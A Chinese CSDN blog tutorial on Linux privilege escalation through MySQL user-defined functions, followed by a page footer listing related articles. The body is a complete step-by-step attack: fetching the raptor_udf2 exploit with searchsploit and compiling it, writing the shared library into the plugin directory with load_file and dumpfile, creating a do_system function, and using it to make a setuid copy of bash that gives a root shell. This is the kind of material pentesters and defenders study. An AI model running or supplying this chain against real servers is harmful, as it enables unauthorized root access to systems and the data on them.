linux提权——Mysql UDF提权

最新推荐文章于 2024-04-28 16:11:59 发布
最新推荐文章于 2024-04-28 16:11:59 发布
阅读量523 收藏 6
点赞数 5
分类专栏: web渗透测试 文章标签: linux mysql adb
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55202378/article/details/137673158
版权

文章目录

UDF:user define fucntion,在mysql中,允许用户创建自定义函数,这些函数可以在SQL查询语句中使用,通过使用UDF,用户可以对数据库执行自定义操作。

提权条件:

  • 拥有mysql数据库账号,且这个账号对mysql数据库有create、insert、delete权限;
  • mysql数据库的secure_file_priv为空,这个变量主要限制load data、select * into outfil、load_file()只能在特定目录进行。

    该变量有三种情况:

    • secure_file_priv=null:所有路径不可写;
    • secure_file_priv='':所有路径可写;
    • secure_file_priv='/xxx/xxx':/xxx/xxx路径可写;
searchsploit mysql udf # 寻找mysql UDF相关的EXP
searchsploit mysql udf -m 1518.c # 将漏洞库中的1518.c下载到当前目录

在这里插入图片描述

gcc编译的时候,不指定相关参数,直接接源文件,可能会有各种各样的报错。

简单查看该EXP,在利用过程中,需要登陆到mysql数据库,新建表,在表中插入编译好的共享库,

mysql数据库是mysql的核心数据库,主要负责存储数据库的用户、权限设置、关键字等mysql自己需要使用的控制和管理信息。

在这里插入图片描述

gcc -g -c <源码文件> -fPIC
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

-g:生成调试信息
-c:仅仅编译源代码,不进行链接,通常生成.o文件
-fPIC:生成位置无关代码,PIC(Position independent code),这种代码可以在内存中的任何位置执行,
在这里插入图片描述

docker cp <宿主机文件路径> container_id:<coker容器中文件路径> # 将生成的so动态链接库文件传入docker容器内

在这里插入图片描述

mysql -u root -p # 登录mysql数据库

# 查看是否满足UDF提权的基本条件
select user(); # 查看当前用户权限
show variables like '%secure_file_priv%' # 查看mysql中secure_file_priv的值

# 写入so共享库文件路径
show variables like '%plugin%'

这里账号权限属于root权限,且secure_file_priv的值为空,意味着任何一个目录都是可写的。故满足mysql UDF提权的基本条件。
在这里插入图片描述

create table foo(line blob):  # 创建一个名为foo的数据表,有一个line列,其中的数据类型为blob。基本语法:create table table_name(columns datatype,...)
# foo在计算机编程和网络领域是一个常用的占位服务名称,本身没有任何意义;
# blob,即binary object,二进制对象,在存储二进制数据(如图像音频,UDF函数等)时,经常用这种数据类型。

insert into foo values(load_file('/tmp/raptor_udf2.so'));    # mysql插入语法:insert into table_name(column1,...) values (values1, ...)
# load_file():mysql中从本机导入文件

select * from foo into dumpfile('/usr/lib/nysql/plugin/raptor_udf2.so'); # 查询foo表中的所有数据,并将其写入/usr/lib/nysql/plugin/raptor_udf2.so
# outfile和dumpfile的区别:
# outfile可以写入多行数据,并且字段和行终止符都可以作为格式输出;
# dumpfile只能写一行,并且输出中不存在任何格式。
# 注意:outfile导出二进制文件的时候会出错,最好用dumpfile

create function do_system returns integer soname 'raptor_udf2.so'; # 创建自定义函数
# 函数名为do_system;
# 返回值为整形,soname共享库名字为‘raptor_udf2.so’,mysql的共享库路径就是/usr/lib/mysql/plugin/

select * from mysql.func; # 查看mysql自定义函数

select do_system('cp /bin/bash /tmp/rootbash;chmod +xs /tmp/rootbash'); # 执行系统命令

/tmp/rootbash -p # 退出mysql连接,-p是以特权root身份启动bash.

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

chown mysql:mysql <文件路径>:修改文件属主。

PT_silver
关注
  • 5
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Mysql数据库提权——UDF提权
cxrpty的博客
03-11 1796
实验原理:UDF可以理解为MySQL的函数库,可以利用UDF定义创建函数(其中包括了执行系统命令的函数),要想利用udf, 必须上传udf.dll作为udf的执行库,mysql中支持UDF扩展 ,使得我们可以调用DLL里面的函数来实现一些特殊的功能 实验条件 :1.具有mysql的root权限,且mysql以system权限运行 ...
linux环境下的MySQL UDF提权
黑战士的博客
04-25 1128
#1. 背景介绍###UDF(user defined function)用户自定义函数,是MySQL的一个扩展接口,称为用户自定义函数,是用来拓展MySQL的技术手段,用户通过自定义函数来实现在MySQL中无法实现的功能。文件后缀为.dll或.so,常用c语言编写。拿到一个WebShell之后,在利用操作系统本身存在的漏洞提权的时候发现补丁全部被修补。这个时候需要利用第三方应用提权。当MYSQL权限比较高的时候我们就可以利用udf提权。###利用前提mysqlfuncfunc。
攻防演练作为红方:postgresql提权UDF提权 ,及其好用的工具
最新发布
keyboard专栏
04-28 636
在 PostgreSQL 中,用户定义的函数(UDF提权是一种常见的提升权限的方法,尤其是当你已经获得了数据库的访问权限但需要更高级别系统权限时。UDF 提权涉及在数据库中创建或使用函数,这些函数可以执行系统级别的命令,从而允许攻击者在数据库服务器上执行任意代码。
【数据库提权Mysql-UDF 提权
qq_48201589的博客
06-24 539
UDF(user defined function),用户自定义函数。UDF提权是利用数据库将地权限的shell提权到高权限。当我们通过webshell获取到Apache服务器的权限,而获取到的用户只是网络服务权限www或其他普通用户,则我们可以利用mysqlUDF提权获取到管理员权限。
MySQL提权UDF
不曾扬帆,何以至远方
07-01 1302
MySQL UDFf提权
mysql udf提权
weixin_44304678的博客
03-25 310
上传成功后,执行如下命令创建自定义函数。
Linux利用UDF库实现Mysql提权
09-10
根据MySQL函数族的可扩展机制,意味着用户可以自己建立包含有自定义函数的动态库来创建自定义函数,简称udf
mysql udf提权文件
02-01
mysql udf提权文件mysql udf提权文件
mysql提权udf
09-20
mysql免杀UDF 提权必不可少神器。必须配备
mysql.zip_ROOT_mysql提权_udf_udf mysql_提权
09-19
提权用的 udf 得到root帐号可以用这个提权
mysql提权总结
weixin_45605374的博客
12-12 727
udf提权 UDF(user defined function)用户定义函数,是mysql的一次拓展连接⼝。用户可以通过自定义函数实现在mysql中⽆法例实现的功能,其新函数都可以在sql语句中添加中调使⽤,像调⽤本机函数⼀样。 前提条件 已经获取到数据库的账号、密码,可以远程连接到 mysql有写入文件的权限,即secure_file_priv的值为空。 show global variables like 'secure%'; mysql版本区别 1、MySQL<5.0,导出路径随意;
mysql的root权限下提权
02-28
mysql的root权限下提权
Windows提权mysql数据库提权(UDF提权)
mrx56的博客
03-31 3071
可通过sqlmap或者msf获取udf文件。
mysql数据库提权
m0_63197559的博客
04-10 573
MySQL数据库提权学习总结
linuxudf提权_MYSQL提权--UDF提权
weixin_35507450的博客
01-17 1203
前言:udf提权是通过数据库来实现获取目标的管理员的shell,来达到从低权限提权到高权限什么是UDFudf(Userdefined function)是用户自定义函数在mysql中函数是什么,比如mysql中常见的sleep(),sum(),ascii()等都是函数udf就是为了让我们开发者能够自己写方便自己函数,它有3种返回值,这三种分别是STRING,INTEGER,REALSTRING ...
mysql udf提权_mysql——udf提权
weixin_39958025的博客
12-05 144
01前言udf = ‘user defined function‘,即‘用户自定义函数’。文件后缀为‘.dll’,常用c语言编写。通过在udf文件中定义新函数,对MYSQL的功能进行扩充,可以执行系统任意命令。将MYSQL账号root转化为系统system权限。02思路1.将udf文件上传到指定位置sqlmap中有现成的udf文件,有linux版本和windows版本分为32位和64位,...
MySQL通过UDF实现扩展功能(Linux环境和Windows环境)
JimCal
06-12 6292
    最近项目数据库选型,对于自治事务这个特性,在MySQL和PostGreSQL二者摇摆了很多时间,后来,发现,通过UDF可以巧妙实现,下面来记录下过程:    环境说明:        - 服务器环境: CentOS7.1        - 数据库环境: MYSQL5.7.19    //...
jsp拿不到回显数据_渗透mysql数据库总结
weixin_39531582的博客
11-21 284
前言今天给大家总结一下渗透mysql的一些技巧。本文只是点到为止,不会讲的太细。一、sqlshell获取要利用mysql首先得拿到一个可以执行sql的mysql才能利用,下面就说一下几种常见姿势,欢迎补充。1、弱口令这个比较简单,网上工具很多如美杜莎,九头蛇这些比较知名的,msf也有相应的模块。我自己之前也写过一个。要是运气好的话直接跑到弱口令就直接进去,当然也可以配合社工字典来跑这样成功率更高。...
MySQL 利用UDF执行命令
热门推荐
1ame的博客
09-02 1万+
UDF即User-Defined Functions lib_mysqludf_sys 在github的介绍: A UDF library with functions to interact with the operating system. These functions allow you to interact with the execution environment
mysql udf 提权
03-06
MySQL UDF(User-Defined Function)是MySQL中的用户自定义函数,它允许用户通过编写自己的函数来扩展MySQL的功能。UDF可以用于实现各种自定义功能,包括提权提权是指通过某种方式获取更高权限的操作。在MySQL中,如果你拥有一个低权限的账户,但是想要执行高权限操作,可以通过UDF提权来实现。 具体来说,你可以编写一个UDF函数,该函数可以执行一些需要高权限才能执行的操作,比如修改系统文件、执行系统命令等。然后将该UDF函数加载到MySQL中,并使用低权限账户调用该函数,从而实现提权操作。 需要注意的是,UDF提权需要满足以下条件: 1. 你需要有CREATE FUNCTION权限,以创建和加载UDF函数。 2. 你需要找到一个合适的提权方法,并编写相应的UDF函数。 3. 你需要知道目标MySQL服务器的版本和配置,以确保你选择的提权方法适用于该版本和配置。 请注意,提权是一种潜在的安全风险行为,应该谨慎使用,并且仅在合法授权的情况下进行。滥用提权功能可能导致系统被攻击或数据泄露等安全问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值